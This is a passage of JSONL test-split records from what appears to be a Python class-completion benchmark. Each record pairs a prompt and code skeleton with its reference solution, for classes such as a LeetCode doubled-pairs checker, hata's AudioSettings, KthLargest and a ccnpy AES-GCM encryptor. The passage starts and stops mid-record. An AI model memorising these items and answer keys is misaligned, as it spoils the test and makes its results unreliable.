\"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n <|body_0|>\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "ArrayOfDoubledPairs_MID_954.py", "source_repo": "953250587/leetcode-python", "split": "test", "star_events_count": 2} {"blob_id": "90d7f72b61728fcea07b2a84f7dd75f7e4bfa464", "bodies": ["if channels is ...:\n channels = CHANNELS_DEFAULT\nelse:\n channels = validate_channels(channels)\nif frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\nelse:\n frame_length = validate_frame_length(frame_length)\nif sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\nelse:\n sampling_rate = validate_sampling_rate(sampling_rate)\nsample_size = 2 * channels\nsamples_per_frame = int(sampling_rate / 1000 * frame_length)\nframe_size = samples_per_frame * sample_size\nbuffer_type = CCharType * frame_size\nself = object.__new__(cls)\nself.buffer_type = buffer_type\nself.channels = channels\nself.frame_length = frame_length\nself.frame_size = frame_size\nself.samples_per_frame = samples_per_frame\nself.sampling_rate = sampling_rate\nself.sample_size = sample_size\nreturn self", "if type(self) is not type(other):\n return NotImplemented\nif self.channels != other.channels:\n return False\nif self.frame_length != other.frame_length:\n return False\nif self.sampling_rate != other.sampling_rate:\n return False\nreturn True", "repr_parts = ['<', self.__class__.__name__]\nrepr_parts.append(' channels = ')\nrepr_parts.append(repr(self.channels))\nrepr_parts.append(', frame_length = ')\nrepr_parts.append(repr(self.frame_length))\nrepr_parts.append(', sampling_rate = ')\nrepr_parts.append(repr(self.sampling_rate))\nrepr_parts.append('>')\nreturn ''.join(repr_parts)", "new = object.__new__(type(self))\nnew.buffer_type = self.buffer_type\nnew.channels = self.channels\nnew.frame_length = self.frame_length\nnew.frame_size = self.frame_size\nnew.samples_per_frame = self.samples_per_frame\nnew.sampling_rate = self.sampling_rate\nnew.sample_size = self.sample_size\nreturn new", "if channels is ...:\n channels = self.channels\nelse:\n channels = validate_channels(channels)\nif frame_length is ...:\n frame_length = self.frame_length\nelse:\n frame_length = validate_frame_length(frame_length)\nif sampling_rate is ...:\n sampling_rate = self.sampling_rate\nelse:\n sampling_rate = validate_sampling_rate(sampling_rate)\nsample_size = 2 * channels\nsamples_per_frame = int(sampling_rate / 1000 * frame_length)\nframe_size = samples_per_frame * sample_size\nbuffer_type = CCharType * frame_size\nnew = object.__new__(type(self))\nnew.buffer_type = buffer_type\nnew.channels = channels\nnew.frame_length = frame_length\nnew.frame_size = frame_size\nnew.samples_per_frame = samples_per_frame\nnew.sampling_rate = sampling_rate\nnew.sample_size = sample_size\nreturn new"], "bodies_text": "<|body_start_0|>\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_2|>\n\n<|body_start_3|>\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n<|end_body_3|>\n\n<|body_start_4|>\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n<|end_body_4|>\n", "class_docstring": "Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.", "class_name": "AudioSettings", "detected_licenses": ["LicenseRef-scancode-warranty-disclaimer"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_0|>\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n <|body_2|>\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n <|body_3|>\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_2|>\n\n<|body_start_3|>\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n<|end_body_3|>\n\n<|body_start_4|>\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000021", "length_bytes": 6797, "license_type": "permissive", "methods": [{"docstring": "Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.", "name": "__new__", "signature": "def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...)"}, {"docstring": "Returns whether the two audio settings are equal.", "name": "__eq__", "signature": "def __eq__(self, other)"}, {"docstring": "Returns the audio settings representation.", "name": "__repr__", "signature": "def __repr__(self)"}, {"docstring": "Copies the audio settings. Returns ------- new : `instance>`", "name": "copy", "signature": "def copy(self)"}, {"docstring": "Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.", "name": "copy_with", "signature": "def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...)"}], "n_methods": 5, "prompt": "Implement the Python class `AudioSettings` described below.\n\nClass description:\nAttributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\n\nMethod signatures and docstrings:\n- def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...): Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\n- def __eq__(self, other): Returns whether the two audio settings are equal.\n- def __repr__(self): Returns the audio settings representation.\n- def copy(self): Copies the audio settings. Returns ------- new : `instance>`\n- def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...): Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.", "prompted_full_text": "Implement the Python class `AudioSettings` described below.\n\nClass description:\nAttributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\n\nMethod signatures and docstrings:\n- def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...): Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\n- def __eq__(self, other): Returns whether the two audio settings are equal.\n- def __repr__(self): Returns the audio settings representation.\n- def copy(self): Copies the audio settings. Returns ------- new : `instance>`\n- def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...): Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\n\n<|skeleton|>\nclass AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_0|>\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n <|body_2|>\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n <|body_3|>\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_2|>\n\n<|body_start_3|>\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n<|end_body_3|>\n\n<|body_start_4|>\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n<|end_body_4|>\n", "revision_id": "53f24fdb38459dc5a4fd04f11bdbfee8295b76a4", "skeleton": "<|skeleton|>\nclass AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_0|>\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n <|body_2|>\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n <|body_3|>\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n", "source": "the_stack_v2_python_sparse", "source_path": "hata/discord/voice/audio_settings/audio_settings.py", "source_repo": "HuyaneMatsu/hata", "split": "test", "star_events_count": 3} {"blob_id": "0c70a6ae6b72489e68ca3b12f63c1510a603e752", "bodies": ["self.k = k\nself.nums = nums\nheapq.heapify(self.nums)", "heapq.heappush(self.nums, val)\nwhile len(self.nums) > self.k:\n heapq.heappop(self.nums)\nreturn self.nums[0]"], "bodies_text": "<|body_start_0|>\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n<|end_body_0|>\n\n<|body_start_1|>\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "KthLargest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass KthLargest:\n\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n <|body_0|>\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n<|end_body_0|>\n\n<|body_start_1|>\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000022", "length_bytes": 1050, "license_type": "no_license", "methods": [{"docstring": ":type k: int :type nums: List[int]", "name": "__init__", "signature": "def __init__(self, k, nums)"}, {"docstring": ":type val: int :rtype: int", "name": "add", "signature": "def add(self, val)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005531", "prompt": "Implement the Python class `KthLargest` described below.\n\nClass description:\nImplement the KthLargest class.\n\nMethod signatures and docstrings:\n- def __init__(self, k, nums): :type k: int :type nums: List[int]\n- def add(self, val): :type val: int :rtype: int", "prompted_full_text": "Implement the Python class `KthLargest` described below.\n\nClass description:\nImplement the KthLargest class.\n\nMethod signatures and docstrings:\n- def __init__(self, k, nums): :type k: int :type nums: List[int]\n- def add(self, val): :type val: int :rtype: int\n\n<|skeleton|>\nclass KthLargest:\n\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n <|body_0|>\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n<|end_body_0|>\n\n<|body_start_1|>\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n<|end_body_1|>\n", "revision_id": "139a2808c551bcf77c8ebba8d387f6ea13c1507c", "skeleton": "<|skeleton|>\nclass KthLargest:\n\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n <|body_0|>\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class KthLargest:\n def __init__(self, k, nums):\n \"\"\":type k: int :type nums: List[int]\"\"\"\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n\n def add(self, val):\n \"\"\":type val: int :rtype: int\"\"\"\n heapq.heappush(self.nums, val)\n while len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "Kth Largest Element in a Stream.py", "source_repo": "arekatlabhanuja/Leetcode-Problems", "split": "test", "star_events_count": 0} {"blob_id": "f1903ce22940930c3bb3a416f3ca6bfdb9c767e6", "bodies": ["if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\nself._key = key\nself._key_number = key_number", "if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\nplaintext = node.serialized_value()\niv = self._key.nonce()\nsecurity_ctx = None\nif len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\nelif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\nelse:\n raise ValueError('Unsupported key length %r' % len(self._key))\nciphertext, a = self._key.encrypt(nonce=iv, 